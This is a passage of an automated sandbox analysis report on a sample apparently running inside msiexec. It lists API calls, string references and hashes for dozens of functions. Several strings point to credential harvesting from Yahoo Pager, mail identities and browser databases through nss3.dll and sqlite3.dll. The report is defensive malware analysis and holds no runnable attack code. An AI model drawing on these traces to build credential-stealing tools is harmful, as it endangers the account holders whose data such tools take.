                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1992179935-0
                                                                                              • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                              • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                              • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                              • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                              APIs
                                                                                              Strings
                                                                                              • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                              • too many SQL variables, xrefs: 0042C6FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                              • API String ID: 2221118986-515162456
                                                                                              • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                              • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                              • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                              • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                              APIs
                                                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                              • memset.MSVCRT ref: 004026AD
                                                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                              • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                              • String ID:
                                                                                              • API String ID: 3503910906-0
                                                                                              • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                              • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                              • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                              • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040C922
                                                                                              • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                              • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                              • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$MenuPostSendStringmemset
                                                                                              • String ID:
                                                                                              • API String ID: 3798638045-0
                                                                                              • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                              • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                              • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                              • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                              APIs
                                                                                                • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                                                • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                              • strlen.MSVCRT ref: 0040B60B
                                                                                              • atoi.MSVCRT(?), ref: 0040B619
                                                                                              • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                              • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                              • String ID:
                                                                                              • API String ID: 4107816708-0
                                                                                              • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                              • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                              • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                              • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                              • _gmtime64.MSVCRT ref: 00411437
                                                                                              • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                              • strftime.MSVCRT ref: 00411476
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                              • String ID:
                                                                                              • API String ID: 1886415126-0
                                                                                              • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                              • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                              • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                              • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: strlen
                                                                                              • String ID: >$>$>
                                                                                              • API String ID: 39653677-3911187716
                                                                                              • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                              • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                              • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                              • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                              • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: @
                                                                                              • API String ID: 3510742995-2766056989
                                                                                              • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                              • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                              • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                              • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strcmpi
                                                                                              • String ID: C@$mail.identity
                                                                                              • API String ID: 1439213657-721921413
                                                                                              • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                              • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                              • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                              • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                              APIs
                                                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                              • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID:
                                                                                              • API String ID: 3473537107-0
                                                                                              • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                              • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                              • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                              • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00444573
                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValuememset
                                                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                              • API String ID: 3363972335-1703613266
                                                                                              • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                              • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                              • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                              • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00406640
                                                                                                • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                              • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                              • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset$memcmp
                                                                                              • String ID: Ul@
                                                                                              • API String ID: 270934217-715280498
                                                                                              • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                              • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                              • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                              • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                              APIs
                                                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                              • sprintf.MSVCRT ref: 0040B929
                                                                                              • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                              • sprintf.MSVCRT ref: 0040B953
                                                                                              • _mbscat.MSVCRT ref: 0040B966
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                              • String ID:
                                                                                              • API String ID: 203655857-0
                                                                                              • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                              • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                              • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                              • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040ADE8
                                                                                              • memset.MSVCRT ref: 0040ADFE
                                                                                                • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                              • sprintf.MSVCRT ref: 0040AE28
                                                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                              • String ID: </%s>
                                                                                              • API String ID: 3699762281-259020660
                                                                                              • Opcode ID: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                              • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                                                              • Opcode Fuzzy Hash: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                              • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                                                              APIs
                                                                                                • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                              Strings
                                                                                              • recovered %d pages from %s, xrefs: 004188B4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                              • String ID: recovered %d pages from %s
                                                                                              • API String ID: 985450955-1623757624
                                                                                              • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                              • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                              • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                              • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _ultoasprintf
                                                                                              • String ID: %s %s %s
                                                                                              • API String ID: 432394123-3850900253
                                                                                              • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                              • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                              • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                              • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00409919
                                                                                              • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendmemset
                                                                                              • String ID: N\@
                                                                                              • API String ID: 568519121-3851889168
                                                                                              • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                              • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                              • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                              • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                              APIs
                                                                                              • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                              • sprintf.MSVCRT ref: 0040909B
                                                                                                • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                              • String ID: menu_%d
                                                                                              • API String ID: 1129539653-2417748251
                                                                                              • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                              • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                              • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                              • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                              APIs
                                                                                              Strings
                                                                                              • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _msizerealloc
                                                                                              • String ID: failed memory resize %u to %u bytes
                                                                                              • API String ID: 2713192863-2134078882
                                                                                              • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                              • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                              • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                              • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                              APIs
                                                                                                • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                              • strrchr.MSVCRT ref: 00409808
                                                                                              • _mbscat.MSVCRT ref: 0040981D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName_mbscatstrrchr
                                                                                              • String ID: _lng.ini
                                                                                              • API String ID: 3334749609-1948609170
                                                                                              • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                              • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                              • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                              • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                              APIs
                                                                                              • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                              • _mbscat.MSVCRT ref: 004070FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscat$_mbscpystrlen
                                                                                              • String ID: sqlite3.dll
                                                                                              • API String ID: 1983510840-1155512374
                                                                                              • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                              • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                              • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                              • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                              APIs
                                                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString
                                                                                              • String ID: A4@$Server Details
                                                                                              • API String ID: 1096422788-4071850762
                                                                                              • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                              • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                              • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                              • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                              • memset.MSVCRT ref: 0042C932
                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID:
                                                                                              • API String ID: 438689982-0
                                                                                              • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                              • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                              • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                              • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                              APIs
                                                                                              • strlen.MSVCRT ref: 0040849A
                                                                                              • memset.MSVCRT ref: 004084D2
                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,6CBC7B60,?,00000000), ref: 0040858F
                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,6CBC7B60,?,00000000), ref: 004085BA
                                                                                              Memory Dump Source
